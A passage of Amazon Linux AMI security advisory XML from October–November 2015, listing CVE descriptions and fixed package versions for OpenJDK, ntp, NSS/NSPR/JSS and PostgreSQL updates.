java-1.8.0-openjdk</title><issued date="2015-10-27 16:39:00" /><updated date="2015-10-27 16:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4911:
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed.
CVE-2015-4903:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4893:
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed.
CVE-2015-4883:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4882:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4881:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4872:
It was discovered that the Security component in OpenJDK failed to properly check if a certificate satisfied all defined constraints. In certain cases, this could cause a Java application to accept an X.509 certificate which does not meet requirements of the defined policy.
CVE-2015-4868:
A flaw was found in the way the Libraries component in OpenJDK handled certificate revocation lists (CRL). In certain cases, CRL checking code could fail to report a revoked certificate, causing the application to accept it as trusted.
CVE-2015-4860:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4844:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4843:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4842:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4840:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4835:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4806:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4805:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4803:
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed.
CVE-2015-4734:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4734" title="" id="CVE-2015-4734" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4803" title="" id="CVE-2015-4803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4805" title="" id="CVE-2015-4805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4806" title="" id="CVE-2015-4806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4835" title="" id="CVE-2015-4835" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4840" title="" id="CVE-2015-4840" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4842" title="" id="CVE-2015-4842" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4843" title="" id="CVE-2015-4843" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4844" title="" id="CVE-2015-4844" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4860" title="" id="CVE-2015-4860" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4868" title="" id="CVE-2015-4868" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4872" title="" id="CVE-2015-4872" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4881" title="" id="CVE-2015-4881" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4882" title="" id="CVE-2015-4882" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4883" title="" id="CVE-2015-4883" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4893" title="" id="CVE-2015-4893" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4903" title="" id="CVE-2015-4903" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4911" title="" id="CVE-2015-4911" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1919.html" title="" id="RHSA-2015:1919" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.65-2.b17.7.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.65-2.b17.7.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.65-2.b17.7.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.65-2.b17.7.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.65-2.b17.7.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.65-2.b17.7.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.65-2.b17.7.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.65-2.b17.7.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.65-2.b17.7.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.65-2.b17.7.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.65-2.b17.7.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.65-2.b17.7.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.65-2.b17.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-607</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-607: important priority package update for ntp</title><issued date="2015-10-27 16:42:00" /><updated date="2015-10-27 16:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7871:
1274265:
CVE-2015-7871 ntp: crypto-NAK symmetric association authentication bypass vulnerability
CVE-2015-7852:
1274261:
CVE-2015-7852 ntp: ntpq atoascii memory corruption vulnerability
CVE-2015-7704:
It was discovered that ntpd as a client did not correctly check timestamps in Kiss-of-Death packets. A remote attacker could use this flaw to send a crafted Kiss-of-Death packet to an ntpd client that would increase the client&#039;s polling interval value, and effectively disable synchronization with the server.
1271070:
CVE-2015-7704 ntp: disabling synchronization via crafted KoD packet
CVE-2015-7702:
1274254:
CVE-2015-7691 CVE-2015-7692 CVE-2015-7702 ntp: incomplete checks in ntp_crypto.c
CVE-2015-7701:
1274255:
CVE-2015-7701 ntp: slow memory leak in CRYPTO_ASSOC
CVE-2015-7692:
1274254:
CVE-2015-7691 CVE-2015-7692 CVE-2015-7702 ntp: incomplete checks in ntp_crypto.c
CVE-2015-7691:
1274254:
CVE-2015-7691 CVE-2015-7692 CVE-2015-7702 ntp: incomplete checks in ntp_crypto.c
CVE-2015-5300:
1271076:
CVE-2015-5300 ntp: MITM attacker can force ntpd to make a step larger than the panic threshold
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5300" title="" id="CVE-2015-5300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7691" title="" id="CVE-2015-7691" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7692" title="" id="CVE-2015-7692" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701" title="" id="CVE-2015-7701" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702" title="" id="CVE-2015-7702" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704" title="" id="CVE-2015-7704" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852" title="" id="CVE-2015-7852" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871" title="" id="CVE-2015-7871" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1930.html" title="" id="RHSA-2015:1930" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp" version="4.2.6p5" release="34.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-34.27.amzn1.x86_64.rpm</filename></package><package name="ntp-doc" version="4.2.6p5" release="34.27.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-34.27.amzn1.noarch.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="34.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-34.27.amzn1.x86_64.rpm</filename></package><package name="ntp-perl" version="4.2.6p5" release="34.27.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.6p5-34.27.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="34.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-34.27.amzn1.x86_64.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="34.27.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-34.27.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.6p5" release="34.27.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-34.27.amzn1.i686.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="34.27.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-34.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-608</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-608: critical priority package update for nspr nss-util nss jss</title><issued date="2015-11-05 01:58:00" /><updated date="2015-11-04 22:49:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7183:
A heap-based buffer overflow was found in NSPR. An attacker could use this flaw to cause NSPR to crash or execute arbitrary code with the permissions of the user running an application compiled against the NSPR library.
1269353:
CVE-2015-7183 nspr: heap-buffer overflow in PL_ARENA_ALLOCATE (MFSA 2015-133)
CVE-2015-7182:
A heap-based buffer overflow flaw was found in the way NSS parsed certain ASN.1 structures. An attacker could use this flaw to cause NSS to crash or execute arbitrary code with the permissions of the user running an application compiled against the NSS library.
1269351:
CVE-2015-7182 nss: ASN.1 decoder heap overflow when decoding constructed OCTET STRING that mixes indefinite and definite length encodings (MFSA 2015-133)
CVE-2015-7181:
A use-after-poison flaw was found in the way NSS parsed certain ASN.1 structures. An attacker could use this flaw to cause NSS to crash or execute arbitrary code with the permissions of the user running an application compiled against the NSS library.
1269345:
CVE-2015-7181 nss: use-after-poison in sec_asn1d_parse_leaf() (MFSA 2015-133)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7181" title="" id="CVE-2015-7181" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7182" title="" id="CVE-2015-7182" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7183" title="" id="CVE-2015-7183" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1981.html" title="" id="RHSA-2015:1981" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nspr" version="4.10.8" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-4.10.8-2.35.amzn1.x86_64.rpm</filename></package><package name="nspr-debuginfo" version="4.10.8" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-debuginfo-4.10.8-2.35.amzn1.x86_64.rpm</filename></package><package name="nspr-devel" version="4.10.8" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-devel-4.10.8-2.35.amzn1.x86_64.rpm</filename></package><package name="nspr-debuginfo" version="4.10.8" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-debuginfo-4.10.8-2.35.amzn1.i686.rpm</filename></package><package name="nspr" version="4.10.8" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-4.10.8-2.35.amzn1.i686.rpm</filename></package><package name="nspr-devel" version="4.10.8" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-devel-4.10.8-2.35.amzn1.i686.rpm</filename></package><package name="nss-util-devel" version="3.19.1" release="4.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-devel-3.19.1-4.47.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.19.1" release="4.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-3.19.1-4.47.amzn1.x86_64.rpm</filename></package><package name="nss-util-debuginfo" version="3.19.1" release="4.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-debuginfo-3.19.1-4.47.amzn1.x86_64.rpm</filename></package><package name="nss-util-debuginfo" version="3.19.1" release="4.47.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-debuginfo-3.19.1-4.47.amzn1.i686.rpm</filename></package><package name="nss-util" version="3.19.1" release="4.47.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-3.19.1-4.47.amzn1.i686.rpm</filename></package><package name="nss-util-devel" version="3.19.1" release="4.47.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-devel-3.19.1-4.47.amzn1.i686.rpm</filename></package><package name="nss" version="3.19.1" release="7.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.19.1-7.74.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.19.1" release="7.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.19.1-7.74.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.19.1" release="7.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.19.1-7.74.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.19.1" release="7.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.19.1-7.74.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.19.1" release="7.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.19.1-7.74.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.19.1" release="7.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.19.1-7.74.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.19.1" release="7.74.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.19.1-7.74.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.19.1" release="7.74.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.19.1-7.74.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.19.1" release="7.74.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.19.1-7.74.amzn1.i686.rpm</filename></package><package name="nss" version="3.19.1" release="7.74.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.19.1-7.74.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.19.1" release="7.74.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.19.1-7.74.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.19.1" release="7.74.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.19.1-7.74.amzn1.i686.rpm</filename></package><package name="jss-debuginfo" version="4.2.6" release="35.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/jss-debuginfo-4.2.6-35.17.amzn1.x86_64.rpm</filename></package><package name="jss" version="4.2.6" release="35.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/jss-4.2.6-35.17.amzn1.x86_64.rpm</filename></package><package name="jss-javadoc" version="4.2.6" release="35.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/jss-javadoc-4.2.6-35.17.amzn1.x86_64.rpm</filename></package><package name="jss" version="4.2.6" release="35.17.amzn1" epoch="0" arch="i686"><filename>Packages/jss-4.2.6-35.17.amzn1.i686.rpm</filename></package><package name="jss-javadoc" version="4.2.6" release="35.17.amzn1" epoch="0" arch="i686"><filename>Packages/jss-javadoc-4.2.6-35.17.amzn1.i686.rpm</filename></package><package name="jss-debuginfo" version="4.2.6" release="35.17.amzn1" epoch="0" arch="i686"><filename>Packages/jss-debuginfo-4.2.6-35.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-609</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-609: medium priority package update for postgresql92 postgresql93 postgresql94</title><issued date="2015-11-05 02:14:00" /><updated date="2015-11-05 03:26:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5289:
Multiple stack-based buffer overflows in json parsing in PostgreSQL before 9.3.x before 9.3.10 and 9.4.x before 9.4.5 allow attackers to cause a denial of service (server crash) via unspecified vectors, which are not properly handled in (1) json or (2) jsonb values.
1270312:
CVE-2015-5289 postgresql: Json or jsonb input values can cause DoS
CVE-2015-5288:
The crypt function in contrib/pgcrypto in PostgreSQL before 9.0.23, 9.1.x before 9.1.19, 9.2.x before 9.2.14, 9.3.x before 9.3.10, and 9.4.x before 9.4.5 allows attackers to cause a denial of service (server crash) or read arbitrary server memory via a &quot;too-short&quot; salt.
1270306:
CVE-2015-5288 postgresql: A few bytes of memory leak in crypt()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5288" title="" id="CVE-2015-5288" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5289" title="" id="CVE-2015-5289" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92-test" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-contrib" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-docs" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.10" release="1.60.amzn1" epoch="0" 